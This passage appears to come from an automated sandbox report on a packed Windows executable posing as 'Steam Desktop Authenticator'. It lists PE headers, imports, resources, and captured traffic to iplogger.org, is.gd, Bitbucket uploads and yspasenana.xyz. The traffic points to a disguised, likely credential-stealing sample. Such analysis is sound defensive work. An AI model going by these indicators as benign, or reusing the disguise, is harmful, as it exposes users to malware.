IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x143000 | 0x358 | .MPRESS2
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x144000 | 0x32548 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x107000 | 0x5f34 | .MPRESS1
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x96c00 | 0x27a0 | .MPRESS1
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x143e50 | 0x28 | .MPRESS2
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x143118 | 0xd0 | .MPRESS2
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.MPRESS1 | 0x1000 | 0x142000 | 0x63400 | False | 1.00032224103 | basic-16 executable not stripped | 7.9995184158 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.MPRESS2 | 0x143000 | 0xe80 | 0x1000 | False | 0.507568359375 | data | 5.65816934801 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0x144000 | 0x32548 | 0x32600 | False | 0.374694672767 | data | 5.82867750581 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x1440f0 | 0x903c | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON | 0x14d154 | 0x10828 | dBase III DBT, version number 0, next free block index 40 | English | United States
RT_ICON | 0x15d9a4 | 0x94a8 | data | English | United States
RT_ICON | 0x166e74 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x167304 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x167794 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x167c24 | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x167d74 | 0x5488 | data | English | United States
RT_ICON | 0x16d224 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 16318463, next used block 4294909696 | English | United States
RT_ICON | 0x171474 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON | 0x173a44 | 0x10a8 | dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON | 0x174b14 | 0x988 | data | English | United States
RT_ICON | 0x1754c4 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_MENU | 0x141bcc | 0x2c8 | empty | English | United States
RT_DIALOG | 0x141e94 | 0xe8 | empty | English | United States
RT_ACCELERATOR | 0x141f7c | 0x48 | empty | English | United States
RT_RCDATA | 0x141fc4 | 0x107 | empty | English | United States
RT_GROUP_ICON | 0x175aac | 0x84 | data | English | United States
RT_GROUP_ICON | 0x175b58 | 0x14 | data | English | United States
RT_GROUP_ICON | 0x175b94 | 0x14 | data | English | United States
RT_GROUP_ICON | 0x175bd0 | 0x14 | data | English | United States
RT_GROUP_ICON | 0x175c0c | 0x14 | data | English | United States
RT_VERSION | 0x175c60 | 0x41e | data | |
RT_MANIFEST | 0x1760c0 | 0x487 | ASCII text, with very long lines, with no line terminators | English | United States

Imports

DLL | Import
KERNEL32 | GetModuleHandleA, GetProcAddress
WSOCK32.dll | WSACleanup
WINMM.dll | mixerOpen
VERSION.dll | VerQueryValueW
COMCTL32.dll | ImageList_Create
PSAPI.DLL | GetModuleBaseNameW
USER32.dll | GetDC
GDI32.dll | BitBlt
COMDLG32.dll | GetOpenFileNameW
ADVAPI32.dll | RegCloseKey
SHELL32.dll | DragFinish
ole32.dll | CoGetObject
OLEAUT32.dll | SafeArrayGetLBound

Version Infos

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright 2017
Assembly Version | 1.0.10.0
InternalName | Steam Desktop Authenticator.exe
FileVersion | 1.0.10
CompanyName |
LegalTrademarks |
Comments | Desktop implementation of Steam's mobile authenticator app
ProductName | Steam Desktop Authenticator
ProductVersion | 1.0.10
FileDescription | Steam Desktop Authenticator
OriginalFilename | Steam Desktop Authenticator.exe

Possible Origin

Language of compilation system | Country where language is spoken | Map
English | United States |

Network Behavior

Network Port Distribution

TCP Packets

Timestamp                             Source Port  Dest Port  Source IP      Dest IP
Jul 22, 2021 11:37:57.835788965 CEST  49714        443        192.168.2.3     88.99.66.31
Jul 22, 2021 11:37:57.907870054 CEST  443          49714      88.99.66.31     192.168.2.3
Jul 22, 2021 11:37:57.907979012 CEST  49714        443        192.168.2.3     88.99.66.31
Jul 22, 2021 11:37:57.952886105 CEST  49714        443        192.168.2.3     88.99.66.31
Jul 22, 2021 11:37:58.025031090 CEST  443          49714      88.99.66.31     192.168.2.3
Jul 22, 2021 11:37:58.027740002 CEST  443          49714      88.99.66.31     192.168.2.3
Jul 22, 2021 11:37:58.027829885 CEST  49714        443        192.168.2.3     88.99.66.31
Jul 22, 2021 11:37:58.027832031 CEST  443          49714      88.99.66.31     192.168.2.3
Jul 22, 2021 11:37:58.027894020 CEST  49714        443        192.168.2.3     88.99.66.31
Jul 22, 2021 11:37:58.027895927 CEST  443          49714      88.99.66.31     192.168.2.3
Jul 22, 2021 11:37:58.027946949 CEST  443          49714      88.99.66.31     192.168.2.3
Jul 22, 2021 11:37:58.027951956 CEST  49714        443        192.168.2.3     88.99.66.31
Jul 22, 2021 11:37:58.028001070 CEST  49714        443        192.168.2.3     88.99.66.31
Jul 22, 2021 11:37:58.114913940 CEST  49714        443        192.168.2.3     88.99.66.31
Jul 22, 2021 11:37:58.187679052 CEST  443          49714      88.99.66.31     192.168.2.3
Jul 22, 2021 11:37:58.187784910 CEST  49714        443        192.168.2.3     88.99.66.31
Jul 22, 2021 11:37:58.218879938 CEST  49714        443        192.168.2.3     88.99.66.31
Jul 22, 2021 11:37:58.299460888 CEST  443          49714      88.99.66.31     192.168.2.3
Jul 22, 2021 11:37:58.299544096 CEST  49714        443        192.168.2.3     88.99.66.31
Jul 22, 2021 11:37:58.429246902 CEST  49715        443        192.168.2.3     104.25.233.53
Jul 22, 2021 11:37:58.470644951 CEST  443          49715      104.25.233.53   192.168.2.3
Jul 22, 2021 11:37:58.470773935 CEST  49715        443        192.168.2.3     104.25.233.53
Jul 22, 2021 11:37:58.471461058 CEST  49715        443        192.168.2.3     104.25.233.53
Jul 22, 2021 11:37:58.512767076 CEST  443          49715      104.25.233.53   192.168.2.3
Jul 22, 2021 11:37:58.516707897 CEST  443          49715      104.25.233.53   192.168.2.3
Jul 22, 2021 11:37:58.516778946 CEST  443          49715      104.25.233.53   192.168.2.3
Jul 22, 2021 11:37:58.516823053 CEST  49715        443        192.168.2.3     104.25.233.53
Jul 22, 2021 11:37:58.516897917 CEST  49715        443        192.168.2.3     104.25.233.53
Jul 22, 2021 11:37:58.533257008 CEST  49715        443        192.168.2.3     104.25.233.53
Jul 22, 2021 11:37:58.574512005 CEST  443          49715      104.25.233.53   192.168.2.3
Jul 22, 2021 11:37:58.574672937 CEST  443          49715      104.25.233.53   192.168.2.3
Jul 22, 2021 11:37:58.574744940 CEST  49715        443        192.168.2.3     104.25.233.53
Jul 22, 2021 11:37:58.575479031 CEST  49715        443        192.168.2.3     104.25.233.53
Jul 22, 2021 11:37:58.616698027 CEST  443          49715      104.25.233.53   192.168.2.3
Jul 22, 2021 11:37:58.802011013 CEST  443          49715      104.25.233.53   192.168.2.3
Jul 22, 2021 11:37:58.802097082 CEST  49715        443        192.168.2.3     104.25.233.53
Jul 22, 2021 11:37:58.892808914 CEST  49716        443        192.168.2.3     104.192.141.1
Jul 22, 2021 11:37:58.934436083 CEST  443          49716      104.192.141.1   192.168.2.3
Jul 22, 2021 11:37:58.934623957 CEST  49716        443        192.168.2.3     104.192.141.1
Jul 22, 2021 11:37:58.936161041 CEST  49716        443        192.168.2.3     104.192.141.1
Jul 22, 2021 11:37:58.978127003 CEST  443          49716      104.192.141.1   192.168.2.3
Jul 22, 2021 11:37:59.155333042 CEST  443          49716      104.192.141.1   192.168.2.3
Jul 22, 2021 11:37:59.155380964 CEST  443          49716      104.192.141.1   192.168.2.3
Jul 22, 2021 11:37:59.155395031 CEST  443          49716      104.192.141.1   192.168.2.3
Jul 22, 2021 11:37:59.155512094 CEST  49716        443        192.168.2.3     104.192.141.1
Jul 22, 2021 11:37:59.155566931 CEST  49716        443        192.168.2.3     104.192.141.1
Jul 22, 2021 11:37:59.171494961 CEST  49716        443        192.168.2.3     104.192.141.1
Jul 22, 2021 11:37:59.184787035 CEST  443          49716      104.192.141.1   192.168.2.3
Jul 22, 2021 11:37:59.184953928 CEST  49716        443        192.168.2.3     104.192.141.1
Jul 22, 2021 11:37:59.213407040 CEST  443          49716      104.192.141.1   192.168.2.3
Jul 22, 2021 11:37:59.302983046 CEST  443          49716      104.192.141.1   192.168.2.3
Jul 22, 2021 11:37:59.303200006 CEST  49716        443        192.168.2.3     104.192.141.1
Jul 22, 2021 11:37:59.305109978 CEST  49716        443        192.168.2.3     104.192.141.1
Jul 22, 2021 11:37:59.347016096 CEST  443          49716      104.192.141.1   192.168.2.3
Jul 22, 2021 11:37:59.500459909 CEST  443          49716      104.192.141.1   192.168.2.3
Jul 22, 2021 11:37:59.500571012 CEST  443          49716      104.192.141.1   192.168.2.3
Jul 22, 2021 11:37:59.500804901 CEST  49716        443        192.168.2.3     104.192.141.1
Jul 22, 2021 11:37:59.524820089 CEST  443          49716      104.192.141.1   192.168.2.3
Jul 22, 2021 11:37:59.525036097 CEST  49716        443        192.168.2.3     104.192.141.1
Jul 22, 2021 11:37:59.601762056 CEST  49717        443        192.168.2.3     52.216.94.27
Jul 22, 2021 11:37:59.771356106 CEST  443          49717      52.216.94.27    192.168.2.3
Jul 22, 2021 11:37:59.771563053 CEST  49717        443        192.168.2.3     52.216.94.27
Jul 22, 2021 11:37:59.772926092 CEST  49717        443        192.168.2.3     52.216.94.27
Jul 22, 2021 11:37:59.939544916 CEST  443          49717      52.216.94.27    192.168.2.3
Jul 22, 2021 11:37:59.939569950 CEST  443          49717      52.216.94.27    192.168.2.3
Jul 22, 2021 11:37:59.939593077 CEST  443          49717      52.216.94.27    192.168.2.3
Jul 22, 2021 11:37:59.939620018 CEST  443          49717      52.216.94.27    192.168.2.3
Jul 22, 2021 11:37:59.939636946 CEST  443          49717      52.216.94.27    192.168.2.3
Jul 22, 2021 11:37:59.939640999 CEST  49717        443        192.168.2.3     52.216.94.27
Jul 22, 2021 11:37:59.939675093 CEST  49717        443        192.168.2.3     52.216.94.27
Jul 22, 2021 11:37:59.939721107 CEST  49717        443        192.168.2.3     52.216.94.27
Jul 22, 2021 11:37:59.940562010 CEST  443          49717      52.216.94.27    192.168.2.3
Jul 22, 2021 11:37:59.940587044 CEST  443          49717      52.216.94.27    192.168.2.3
Jul 22, 2021 11:37:59.940634966 CEST  49717        443        192.168.2.3     52.216.94.27
Jul 22, 2021 11:37:59.940665960 CEST  49717        443        192.168.2.3     52.216.94.27
Jul 22, 2021 11:37:59.957046032 CEST  49717        443        192.168.2.3     52.216.94.27
Jul 22, 2021 11:37:59.961602926 CEST  443          49717      52.216.94.27    192.168.2.3
Jul 22, 2021 11:38:00.028075933 CEST  49717        443        192.168.2.3     52.216.94.27
Jul 22, 2021 11:38:00.125987053 CEST  443          49717      52.216.94.27    192.168.2.3
Jul 22, 2021 11:38:00.126014948 CEST  443          49717      52.216.94.27    192.168.2.3
Jul 22, 2021 11:38:00.126024961 CEST  443          49717      52.216.94.27    192.168.2.3
Jul 22, 2021 11:38:00.127441883 CEST  49717        443        192.168.2.3     52.216.94.27
Jul 22, 2021 11:38:00.129054070 CEST  49717        443        192.168.2.3     52.216.94.27
Jul 22, 2021 11:38:00.340260029 CEST  443          49717      52.216.94.27    192.168.2.3
Jul 22, 2021 11:38:00.340316057 CEST  443          49717      52.216.94.27    192.168.2.3
Jul 22, 2021 11:38:00.340363979 CEST  443          49717      52.216.94.27    192.168.2.3
Jul 22, 2021 11:38:00.340406895 CEST  443          49717      52.216.94.27    192.168.2.3
Jul 22, 2021 11:38:00.340456009 CEST  443          49717      52.216.94.27    192.168.2.3
Jul 22, 2021 11:38:00.340507984 CEST  443          49717      52.216.94.27    192.168.2.3
Jul 22, 2021 11:38:00.340514898 CEST  49717        443        192.168.2.3     52.216.94.27
Jul 22, 2021 11:38:00.340555906 CEST  443          49717      52.216.94.27    192.168.2.3
Jul 22, 2021 11:38:00.340600014 CEST  443          49717      52.216.94.27    192.168.2.3
Jul 22, 2021 11:38:00.340610027 CEST  49717        443        192.168.2.3     52.216.94.27
Jul 22, 2021 11:38:00.340640068 CEST  443          49717      52.216.94.27    192.168.2.3
Jul 22, 2021 11:38:00.340677023 CEST  443          49717      52.216.94.27    192.168.2.3
Jul 22, 2021 11:38:00.340718031 CEST  49717        443        192.168.2.3     52.216.94.27
Jul 22, 2021 11:38:00.340723991 CEST  443          49717      52.216.94.27    192.168.2.3
Jul 22, 2021 11:38:00.340764999 CEST  443          49717      52.216.94.27    192.168.2.3
Jul 22, 2021 11:38:00.340789080 CEST  49717        443        192.168.2.3     52.216.94.27
Jul 22, 2021 11:38:00.340801954 CEST  443          49717      52.216.94.27    192.168.2.3

UDP Packets

Timestamp                             Source Port  Dest Port  Source IP      Dest IP
Jul 22, 2021 11:37:49.993918896 CEST  53           57544      8.8.8.8         192.168.2.3
Jul 22, 2021 11:37:50.714783907 CEST  55984        53         192.168.2.3     8.8.8.8
Jul 22, 2021 11:37:50.767021894 CEST  53           55984      8.8.8.8         192.168.2.3
Jul 22, 2021 11:37:51.545605898 CEST  64185        53         192.168.2.3     8.8.8.8
Jul 22, 2021 11:37:51.599242926 CEST  53           64185      8.8.8.8         192.168.2.3
Jul 22, 2021 11:37:52.518527985 CEST  65110        53         192.168.2.3     8.8.8.8
Jul 22, 2021 11:37:52.575964928 CEST  53           65110      8.8.8.8         192.168.2.3
Jul 22, 2021 11:37:55.356062889 CEST  58361        53         192.168.2.3     8.8.8.8
Jul 22, 2021 11:37:55.411372900 CEST  53           58361      8.8.8.8         192.168.2.3
Jul 22, 2021 11:37:56.481718063 CEST  63492        53         192.168.2.3     8.8.8.8
Jul 22, 2021 11:37:56.531531096 CEST  53           63492      8.8.8.8         192.168.2.3
Jul 22, 2021 11:37:57.276201963 CEST  60831        53         192.168.2.3     8.8.8.8
Jul 22, 2021 11:37:57.333133936 CEST  53           60831      8.8.8.8         192.168.2.3
Jul 22, 2021 11:37:57.757497072 CEST  60100        53         192.168.2.3     8.8.8.8
Jul 22, 2021 11:37:57.814486980 CEST  53           60100      8.8.8.8         192.168.2.3
Jul 22, 2021 11:37:58.362932920 CEST  53195        53         192.168.2.3     8.8.8.8
Jul 22, 2021 11:37:58.424026012 CEST  53           53195      8.8.8.8         192.168.2.3
Jul 22, 2021 11:37:58.827770948 CEST  50141        53         192.168.2.3     8.8.8.8
Jul 22, 2021 11:37:58.887105942 CEST  53           50141      8.8.8.8         192.168.2.3
Jul 22, 2021 11:37:59.534981012 CEST  53023        53         192.168.2.3     8.8.8.8
Jul 22, 2021 11:37:59.595797062 CEST  53           53023      8.8.8.8         192.168.2.3
Jul 22, 2021 11:38:00.871737957 CEST  49563        53         192.168.2.3     8.8.8.8
Jul 22, 2021 11:38:00.924314976 CEST  53           49563      8.8.8.8         192.168.2.3
Jul 22, 2021 11:38:01.669605970 CEST  51352        53         192.168.2.3     8.8.8.8
Jul 22, 2021 11:38:01.723066092 CEST  53           51352      8.8.8.8         192.168.2.3
Jul 22, 2021 11:38:08.691303968 CEST  59349        53         192.168.2.3     8.8.8.8
Jul 22, 2021 11:38:08.743431091 CEST  53           59349      8.8.8.8         192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:10.312644005 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:38:10.364821911 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:12.773581028 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:38:12.825656891 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:14.909945965 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:38:14.962085962 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:16.382057905 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:38:16.433855057 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:17.513597012 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:38:17.563263893 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:18.926285982 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:38:18.984445095 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:20.146954060 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:38:20.196863890 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:21.459188938 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:38:21.519318104 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:22.303719997 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:38:22.354244947 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:26.582389116 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:38:26.644385099 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:39.779906034 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:38:39.852066040 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:44.697227001 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:38:44.756052017 CEST53565798.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:55.648947954 CEST6063353192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:38:55.717284918 CEST53606338.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:38:58.333266973 CEST6129253192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:38:58.392389059 CEST53612928.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:39:02.829637051 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:39:02.887343884 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:39:07.421799898 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:39:07.485059977 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:39:07.496417999 CEST6194653192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:39:07.556369066 CEST53619468.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:39:12.173031092 CEST6491053192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:39:12.230168104 CEST53649108.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:39:12.983562946 CEST5212353192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:39:13.041392088 CEST53521238.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:39:13.826380968 CEST5613053192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:39:13.885869026 CEST53561308.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:39:14.621644974 CEST5633853192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:39:14.679730892 CEST53563388.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:39:14.694097042 CEST5942053192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:39:14.753855944 CEST53594208.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:39:20.737021923 CEST5878453192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:39:20.793726921 CEST53587848.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:39:30.741025925 CEST6397853192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:39:30.813937902 CEST53639788.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:39:33.155277014 CEST6293853192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:39:33.215610027 CEST53629388.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:39:48.145256996 CEST5570853192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:39:48.205405951 CEST53557088.8.8.8192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:39:48.225770950 CEST5680353192.168.2.38.8.8.8
                                                                                                                                                                                              Jul 22, 2021 11:39:48.283055067 CEST53568038.8.8.8192.168.2.3

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jul 22, 2021 11:37:57.757497072 CEST | 192.168.2.3 | 8.8.8.8 | 0x6b1f | Standard query (0) | iplogger.org | A (IP address) | IN (0x0001)
Jul 22, 2021 11:37:58.362932920 CEST | 192.168.2.3 | 8.8.8.8 | 0x35c | Standard query (0) | is.gd | A (IP address) | IN (0x0001)
Jul 22, 2021 11:37:58.827770948 CEST | 192.168.2.3 | 8.8.8.8 | 0xc8ab | Standard query (0) | bitbucket.org | A (IP address) | IN (0x0001)
Jul 22, 2021 11:37:59.534981012 CEST | 192.168.2.3 | 8.8.8.8 | 0x694d | Standard query (0) | bbuseruploads.s3.amazonaws.com | A (IP address) | IN (0x0001)
Jul 22, 2021 11:39:02.829637051 CEST | 192.168.2.3 | 8.8.8.8 | 0x37fc | Standard query (0) | yspasenana.xyz | A (IP address) | IN (0x0001)
Jul 22, 2021 11:39:07.421799898 CEST | 192.168.2.3 | 8.8.8.8 | 0x9cbd | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001)
Jul 22, 2021 11:39:07.496417999 CEST | 192.168.2.3 | 8.8.8.8 | 0xde65 | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001)
Jul 22, 2021 11:39:12.173031092 CEST | 192.168.2.3 | 8.8.8.8 | 0x7d8e | Standard query (0) | yspasenana.xyz | A (IP address) | IN (0x0001)
Jul 22, 2021 11:39:12.983562946 CEST | 192.168.2.3 | 8.8.8.8 | 0x617 | Standard query (0) | yspasenana.xyz | A (IP address) | IN (0x0001)
Jul 22, 2021 11:39:13.826380968 CEST | 192.168.2.3 | 8.8.8.8 | 0xbae6 | Standard query (0) | bitbucket.org | A (IP address) | IN (0x0001)
Jul 22, 2021 11:39:14.621644974 CEST | 192.168.2.3 | 8.8.8.8 | 0xe505 | Standard query (0) | bbuseruploads.s3.amazonaws.com | A (IP address) | IN (0x0001)
Jul 22, 2021 11:39:14.694097042 CEST | 192.168.2.3 | 8.8.8.8 | 0xfae9 | Standard query (0) | bbuseruploads.s3.amazonaws.com | A (IP address) | IN (0x0001)
Jul 22, 2021 11:39:20.737021923 CEST | 192.168.2.3 | 8.8.8.8 | 0x6d07 | Standard query (0) | yspasenana.xyz | A (IP address) | IN (0x0001)
Jul 22, 2021 11:39:48.145256996 CEST | 192.168.2.3 | 8.8.8.8 | 0xaf28 | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001)
Jul 22, 2021 11:39:48.225770950 CEST | 192.168.2.3 | 8.8.8.8 | 0x3714 | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jul 22, 2021 11:37:57.814486980 CEST | 8.8.8.8 | 192.168.2.3 | 0x6b1f | No error (0) | iplogger.org | | 88.99.66.31 | A (IP address) | IN (0x0001)
Jul 22, 2021 11:37:58.424026012 CEST | 8.8.8.8 | 192.168.2.3 | 0x35c | No error (0) | is.gd | | 104.25.233.53 | A (IP address) | IN (0x0001)
Jul 22, 2021 11:37:58.424026012 CEST | 8.8.8.8 | 192.168.2.3 | 0x35c | No error (0) | is.gd | | 104.25.234.53 | A (IP address) | IN (0x0001)
Jul 22, 2021 11:37:58.424026012 CEST | 8.8.8.8 | 192.168.2.3 | 0x35c | No error (0) | is.gd | | 172.67.83.132 | A (IP address) | IN (0x0001)
Jul 22, 2021 11:37:58.887105942 CEST | 8.8.8.8 | 192.168.2.3 | 0xc8ab | No error (0) | bitbucket.org | | 104.192.141.1 | A (IP address) | IN (0x0001)
Jul 22, 2021 11:37:59.595797062 CEST | 8.8.8.8 | 192.168.2.3 | 0x694d | No error (0) | bbuseruploads.s3.amazonaws.com | s3-1-w.amazonaws.com | | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 11:37:59.595797062 CEST | 8.8.8.8 | 192.168.2.3 | 0x694d | No error (0) | s3-1-w.amazonaws.com | s3-w.us-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 11:37:59.595797062 CEST | 8.8.8.8 | 192.168.2.3 | 0x694d | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.216.94.27 | A (IP address) | IN (0x0001)
Jul 22, 2021 11:39:02.887343884 CEST | 8.8.8.8 | 192.168.2.3 | 0x37fc | No error (0) | yspasenana.xyz | | 212.224.105.105 | A (IP address) | IN (0x0001)
Jul 22, 2021 11:39:07.485059977 CEST | 8.8.8.8 | 192.168.2.3 | 0x9cbd | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 11:39:07.556369066 CEST | 8.8.8.8 | 192.168.2.3 | 0xde65 | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 11:39:12.230168104 CEST | 8.8.8.8 | 192.168.2.3 | 0x7d8e | No error (0) | yspasenana.xyz | | 212.224.105.105 | A (IP address) | IN (0x0001)
Jul 22, 2021 11:39:13.041392088 CEST | 8.8.8.8 | 192.168.2.3 | 0x617 | No error (0) | yspasenana.xyz | | 212.224.105.105 | A (IP address) | IN (0x0001)
Jul 22, 2021 11:39:13.885869026 CEST | 8.8.8.8 | 192.168.2.3 | 0xbae6 | No error (0) | bitbucket.org | | 104.192.141.1 | A (IP address) | IN (0x0001)
Jul 22, 2021 11:39:14.679730892 CEST | 8.8.8.8 | 192.168.2.3 | 0xe505 | No error (0) | bbuseruploads.s3.amazonaws.com | s3-1-w.amazonaws.com | | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 11:39:14.679730892 CEST | 8.8.8.8 | 192.168.2.3 | 0xe505 | No error (0) | s3-1-w.amazonaws.com | s3-w.us-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 11:39:14.679730892 CEST | 8.8.8.8 | 192.168.2.3 | 0xe505 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.80.20 | A (IP address) | IN (0x0001)
Jul 22, 2021 11:39:14.753855944 CEST | 8.8.8.8 | 192.168.2.3 | 0xfae9 | No error (0) | bbuseruploads.s3.amazonaws.com | s3-1-w.amazonaws.com | | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 11:39:14.753855944 CEST | 8.8.8.8 | 192.168.2.3 | 0xfae9 | No error (0) | s3-1-w.amazonaws.com | s3-w.us-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 11:39:14.753855944 CEST | 8.8.8.8 | 192.168.2.3 | 0xfae9 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.80.20 | A (IP address) | IN (0x0001)
Jul 22, 2021 11:39:20.793726921 CEST | 8.8.8.8 | 192.168.2.3 | 0x6d07 | No error (0) | yspasenana.xyz | | 212.224.105.105 | A (IP address) | IN (0x0001)
Jul 22, 2021 11:39:48.205405951 CEST | 8.8.8.8 | 192.168.2.3 | 0xaf28 | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001)
